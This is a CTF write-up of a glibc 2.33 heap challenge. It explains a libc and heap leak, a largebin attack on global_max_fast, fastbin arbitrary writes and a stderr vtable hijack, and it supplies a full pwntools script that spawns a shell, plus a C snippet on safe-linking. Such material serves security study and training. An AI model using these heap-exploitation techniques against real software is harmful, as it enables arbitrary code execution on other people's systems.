[Dest0g3 520 Orientation Contest] Dest0g3_heap: still took a long time after getting the WP
2022-06-13 02:23:00 【Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi Shi】
I hadn't done this one before and kept trying to figure it out. I had the WP for a long time, and then it came together step by step. The official WP contains a lot of redundant code uploaded by the solvers, so it is very hard to follow, but I had some time to catch up over the weekend, and after repeated attempts it finally worked.
The challenge first creates a block at a 5-byte address (an mmap region); inside this block you can edit and free at will. add uses calloc, so tcache is not used; show reads from the address stored in buf. Because every edit goes through the mmap block, writing to libc addresses will be awkward.
The exploit uses the global_max_fast variable, which is referenced in libc's mallopt function; in libc-2.33 its offset is 0x1e3e78.
__int64 __fastcall mallopt(unsigned int a1, int a2)
{
    ......
    case 1u:                              // M_MXFAST
        v4 = 0LL;
        if ( (unsigned __int64)a2 <= 0xA0 )
        {
            v4 = a1;
            v7 = (a2 + 8LL) & 0xFFFFFFFFFFFFFFF0LL;
            if ( (unsigned __int64)a2 <= 7 )
                v7 = 16LL;
            qword_1E3E78 = v7;            // global_max_fast
        }
        break;
    ......
}
This value is the maximum chunk size served from fastbins; the default is 0x80 (you can also find it directly by searching libc's readable and writable region for 0x0000000000000080). If it is increased, freeing a larger chunk no longer sends it to the unsorted bin but straight into a fastbin. If the fd pointer of that chunk is then modified to a value A, the next allocation of that size puts A into the fastbin pointer area (because global_max_fast was raised, the size exceeds the 0x80 limit, so the write goes past fastbinsY and A is written to the location at the corresponding offset). fastbinsY lives at main_arena+0x10, one 8-byte pointer per entry, with chunk sizes differing by 0x10 between adjacent entries. So to write to a chosen location, free a chunk of the matching size into the fastbin, which gives the formula:
chunk_size = (where - fastbinY)*2 + 0x10
The flow of this challenge is then:
- Leak the libc and heap addresses:
- First allocate a chunk in the normal heap, then free a large chunk in the mmap region into the unsorted bin. Allocating the same size again returns the chunk just freed in the mmap region, which sets buf to point inside the mmap block.
- Free two large chunks into the unsorted bin so they form a chain: fd -> main_arena, bk -> the next unsorted chunk. After suitably overwriting the 0 bytes, you can read out the libc and heap addresses.
- Use a largebin attack to modify global_max_fast
- Because this part is rather complicated and I didn't fully understand it, I just copied the pattern; the principle is omitted.
- First free a large chunk into the unsorted bin; when a larger chunk is then allocated, it is placed into the largebin.
- Free another chunk into the unsorted bin and modify the pointer of the first largebin chunk to global_max_fast-0x20-3 (the -3 is for misalignment, so only two bytes are written here).
- When a large chunk is allocated again, the address of the newly modified pointer is written at global_max_fast-3 (which changes the value from 0x80 to a 2-byte value XXXX). When a larger chunk (smaller than this XXXX) is freed, it goes into a fastbin; allocating the same large size again takes this fastbin chunk, and the fd pointer inside it is written to the corresponding position.
- Modify the vtable pointer at _IO_2_1_stderr_+0xd8 (because the maximum size in this challenge is limited, _IO_file_jumps cannot be written; in the previous challenge ez_kiwi there was no limit and _IO_file_jumps+0x60 could be written with system directly) so that it points to a nearby fake vtable.
- Modify fake_vtable+0x60 to system.
- Modify _IO_2_1_stderr_+0 to /bin/sh\0.
- Because the mmap block is at a 5-byte address, the earlier write to global_max_fast is off by 3 bytes, so the value of global_max_fast is 2 bytes. Allocating a 0xffff chunk here triggers the error path and executes system(/bin/sh).
- The remote environment is ubuntu 21; when using ubuntu20 and patching to the corresponding libc, the libc addresses are 0x1d000 smaller than those on 21.
from pwn import *
'''
patchelf --set-interpreter /home/shi/libc6_2.33-0ubuntu5/lib64/ld-2.33.so pwn
patchelf --add-needed /home/shi/libc6_2.33-0ubuntu5/lib64/libc.so.6 pwn
'''
local = 1
if local == 1:
    p = process('./pwn')
else:
    p = remote('node4.buuoj.cn', 27787)
#libc_elf = ELF('/home/shi/libc6_2.33-0ubuntu5/lib64/libc.so.6')
libc_elf = ELF('/home/shi/libc/libc6_2.33/lib/x86_64-linux-gnu/libc-2.33.so')
elf = ELF('./pwn')
context.arch = 'amd64'
menu = b'>> '

def add(size):
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b"size: ", str(size).encode())

def edit(offset, msg):
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b"size: ", str(len(msg)).encode())
    p.sendlineafter(b"offset: ", str(offset).encode())
    p.sendafter(b"content: ", msg)

def free(offset):
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b"idx: ", str(offset).encode())

def show():
    p.sendlineafter(menu, b'4')
    p.recvuntil(b"content: ")

#1, leak libc and heap addresses
add(0x18)
pay1 = flat(0,0x21,0,0, 0, 0x431, b'\x00'*0x428, 0x21,0,0, 0,0x21)
pay2 = flat(0,0x21,0,0, 0, 0x421, b'\x00'*0x418, 0x21,0,0, 0,0x21)
edit(0, pay1)
edit(0x800, pay2)
free(0x30)
add(0x420)  # make buf point into the mmap region, so show() reads from there
#0x55cd19605050: 0x0000003a9a3de000 0x0000003a9a3de030 <-- mmap_base+0x30
free(0x30)  # free two chunks into the unsorted bin so they form a chain; fd/bk give libc and heap addresses
free(0x830)
#0x3a9a3de030: 0x00007f63a3369c00 0x0000003a9a3de820
#libc_base
edit(0x30, b'A')  # overwrite the null low byte of fd so show() prints the whole pointer
show()
main_arena = u64(p.recv(6).ljust(8, b'\x00')) - ord('A') - 0x60
libc_base = main_arena - 0x10 - libc_elf.sym['__malloc_hook']
libc_elf.address = libc_base
fastbinY = main_arena + 0x10
global_max_fast = libc_base + 0x1e3e78
print('libc:', hex(libc_base))
print('global_max_fast:', hex(global_max_fast))
print('main_arena:', hex(main_arena))
#mmap_heap_base
edit(0x30, b'A'*8)  # overwrite fd completely so that bk (heap pointer) is printed right after the padding
show()
p.recvuntil(b'A'*8)
mmap_base = u64(p.recvuntil(b'1. alloc', drop=True).ljust(8, b'\x00')) - 0x820
print('mmap:', hex(mmap_base))
edit(0x30, p64(main_arena + 0x60))  # restore the modified value

#2, modify global_max_fast via largebin attack
add(0x410)  #unsort2
add(0x500)  #unsort1->large1 +30
edit(0x1200, pay2)
free(0x1230)
edit(0x30, flat(main_arena+0x50+0x400, main_arena+0x50+0x400, 0, global_max_fast -0x20 -3))
add(0x500)
#gef* x/20gx 0x1e3e70+0x007fcbdea55000
#0x7fcbdec38e70: 0x2ae2200000000000 0x000000000000a79f

def write_where(where, what):
    # pick the chunk size whose fastbin entry lands on 'where' (formula from the text above)
    chunk_size = (where - fastbinY)*2 + 0x10
    print(hex(where), 'size:', hex(chunk_size), hex(what))
    edit(0x20, flat(0, chunk_size+0x11,0,0,0,0))
    edit(chunk_size+0x10+0x20, flat(0, 0x21,0,0,0, 0x21))
    free(0x30)
    edit(0x30, p64(what ^ ((mmap_base + 0x30)>>12)))  # safe-linking: fd is stored XORed with (its address >> 12)
    add(chunk_size)

#3, stderr->vtable=fake+380, +380+60 :system, stderr:/bin/sh
#write_where(libc_elf.sym['_IO_file_jumps'] + 96, libc_elf.sym['system'])
write_where(libc_elf.sym['_IO_2_1_stderr_'] + 0x380 + 0x60, libc_elf.sym['system'])
write_where(libc_elf.sym['_IO_2_1_stderr_'] + 0xd8, libc_elf.sym['_IO_2_1_stderr_'] + 0x380)
write_where(libc_elf.sym['_IO_2_1_stderr_'], 0x0068732f6e69622f)
#0x7f2ba5d4d5e0 <_IO_2_1_stderr_>: 0x0068732f6e69622f <--- /bin/sh

# fill the tcache bin for size 0xc0, zeroing fd/key each time to pass the double-free check
edit(0x1800, flat(0,0x21,b'\x00'*0x18, 0xc1, b'\x00'*0xb8, 0x21,b'\x00'*0x18, 0x21,b'\x00'*0x18))
for i in range(7):
    free(0x1830)
    edit(0x1830, p64(0)*2)
free(0x1830)
edit(0x1820, flat(0, 0xce))  # change the size field of the freed chunk
add(0xffff)  # triggers the error path and system("/bin/sh"), as described above
p.interactive()
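The XOR in the write_where line `p64(what ^ ((mmap_base + 0x30)>>12))` is glibc 2.32+ safe-linking, which the writeup uses but does not explain. The following C snippet is an added illustration (not part of the original writeup or of glibc itself): it reimplements the PROTECT_PTR/REVEAL_PTR macros from glibc's malloc.c and the alignment check malloc applies when it takes a chunk off a fastbin, using the chunk address from the gef comment above (0x3a9a3de030) and a constructed aligned target, to show why the mitigation forces an attacker to have the heap address first.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stdio.h>

/* Safe-linking as in glibc >= 2.32 malloc.c: a free chunk's fd is stored as
 * (pos >> 12) ^ ptr, where pos is the address of the fd field itself.
 * Revealing applies the same XOR when the chunk is taken off the bin. */
static uintptr_t protect_ptr(uintptr_t pos, uintptr_t ptr) { return (pos >> 12) ^ ptr; }
static uintptr_t reveal_ptr(uintptr_t pos, uintptr_t stored) { return (pos >> 12) ^ stored; }

/* malloc() aborts with "malloc(): unaligned fastbin chunk detected" when a
 * revealed fastbin pointer is not 16-byte aligned. */
static bool fastbin_next_ok(uintptr_t pos, uintptr_t stored)
{
    return (reveal_ptr(pos, stored) & 0xf) == 0;
}

/* Constructed addresses: the mmap chunk from the gef dump in the writeup and
 * an arbitrary 16-byte aligned libc-like target (placeholder value). */
#define FD_POS  0x3a9a3de030ULL
#define TARGET  0x7f63a3369c00ULL

/* Case 1: the writer knows the heap address and encodes fd correctly, so the
 * pointer round-trips and passes the alignment check. */
static bool encoded_fd_accepted(void)
{
    uintptr_t stored = protect_ptr(FD_POS, TARGET);
    return fastbin_next_ok(FD_POS, stored) && reveal_ptr(FD_POS, stored) == TARGET;
}

/* Case 2: the raw target is written without a heap leak. The low nibble of
 * (FD_POS >> 12) is 0xe, so the revealed pointer is unaligned and rejected. */
static bool raw_fd_rejected(void)
{
    return !fastbin_next_ok(FD_POS, TARGET);
}

int main(void)
{
    printf("encoded fd accepted: %d\n", encoded_fd_accepted());
    printf("raw fd rejected:     %d\n", raw_fd_rejected());
    return 0;
}
```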